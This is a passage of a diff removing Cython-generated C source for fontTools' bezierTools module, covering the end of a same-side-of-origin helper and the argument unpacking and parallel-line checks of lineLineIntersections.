1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_origin, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_origin, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1143, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_yDiff = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1144 - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - * return not (xDiff <= 0.0 and yDiff <= 0.0) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyObject_RichCompare(__pyx_v_xDiff, __pyx_float_0_0, Py_LE); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_6) { - } else { - __pyx_t_5 = __pyx_t_6; - goto __pyx_L3_bool_binop_done; - } - __pyx_t_1 = 
PyObject_RichCompare(__pyx_v_yDiff, __pyx_float_0_0, Py_LE); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_6; - __pyx_L3_bool_binop_done:; - __pyx_t_1 = __Pyx_PyBool_FromLong((!__pyx_t_5)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1144, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools._both_points_are_on_same_side_of_origin", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_xDiff); - __Pyx_XDECREF(__pyx_v_yDiff); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_72lineLineIntersections, "lineLineIntersections(s1, e1, s2, e2)\nFinds intersections between two line segments.\n\n Args:\n s1, e1: Coordinates of the first line as 2D tuples.\n s2, e2: Coordinates of the second line as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n\n >>> a = lineLineIntersections( (310,389), (453, 222), (289, 251), (447, 367))\n >>> len(a)\n 1\n >>> intersection = a[0]\n >>> intersection.pt\n (374.44882952482897, 313.73458370177315)\n >>> (intersection.t1, intersection.t2)\n (0.45069111555824465, 0.5408153767394238)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_73lineLineIntersections = {"lineLineIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_72lineLineIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_73lineLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_s1 = 0; - PyObject *__pyx_v_e1 = 0; - PyObject *__pyx_v_s2 = 0; - PyObject *__pyx_v_e2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int 
__pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("lineLineIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_s1,&__pyx_n_s_e1,&__pyx_n_s_s2,&__pyx_n_s_e2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 1); __PYX_ERR(0, 1147, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if 
(unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 2); __PYX_ERR(0, 1147, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1147, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, 3); __PYX_ERR(0, 1147, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lineLineIntersections") < 0)) __PYX_ERR(0, 1147, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_s1 = values[0]; - __pyx_v_e1 = values[1]; - __pyx_v_s2 = values[2]; - __pyx_v_e2 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("lineLineIntersections", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 1147, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.lineLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(__pyx_self, __pyx_v_s1, __pyx_v_e1, __pyx_v_s2, __pyx_v_e2); - 
- /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s1, PyObject *__pyx_v_e1, PyObject *__pyx_v_s2, PyObject *__pyx_v_e2) { - PyObject *__pyx_v_s1x = NULL; - PyObject *__pyx_v_s1y = NULL; - PyObject *__pyx_v_e1x = NULL; - PyObject *__pyx_v_e1y = NULL; - PyObject *__pyx_v_s2x = NULL; - PyObject *__pyx_v_s2y = NULL; - PyObject *__pyx_v_e2x = NULL; - PyObject *__pyx_v_e2y = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_slope34 = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_v_pt = NULL; - PyObject *__pyx_v_slope12 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_t_6; - int __pyx_t_7; - int __pyx_t_8; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("lineLineIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1170 - * (0.45069111555824465, 0.5408153767394238) - * """ - * s1x, s1y = s1 # <<<<<<<<<<<<<< - * e1x, e1y = e1 - * s2x, s2y = s2 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s1))) || (PyList_CheckExact(__pyx_v_s1))) { - PyObject* sequence = __pyx_v_s1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1170, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - 
__pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1170, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1170, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1170, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_s1x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_s1y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1171 - * """ - * s1x, s1y = s1 - * e1x, e1y = e1 # <<<<<<<<<<<<<< - * s2x, s2y = s2 - * e2x, e2y = e2 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e1))) || (PyList_CheckExact(__pyx_v_e1))) { - PyObject* sequence = __pyx_v_e1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - 
__PYX_ERR(0, 1171, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1171, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1171, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1171, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_e1x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_e1y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1172 - * s1x, s1y = s1 - * e1x, e1y = e1 - * s2x, s2y = s2 # <<<<<<<<<<<<<< - * e2x, e2y = e2 - * if ( - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s2))) || (PyList_CheckExact(__pyx_v_s2))) { - PyObject* sequence = __pyx_v_s2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - 
if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1172, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1172, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1172, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_s2x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_s2y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1173 - * e1x, e1y = e1 - * s2x, s2y = s2 - * e2x, e2y = e2 # <<<<<<<<<<<<<< - * if ( - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and 
not math.isclose(s1x, s2x) - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e2))) || (PyList_CheckExact(__pyx_v_e2))) { - PyObject* sequence = __pyx_v_e2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1173, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1173, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1173, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_e2x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_e2y = 
__pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1175 - * e2x, e2y = e2 - * if ( - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) # <<<<<<<<<<<<<< - * ): # Parallel vertical - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L12_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if 
(unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1x, __pyx_v_e1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L12_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - 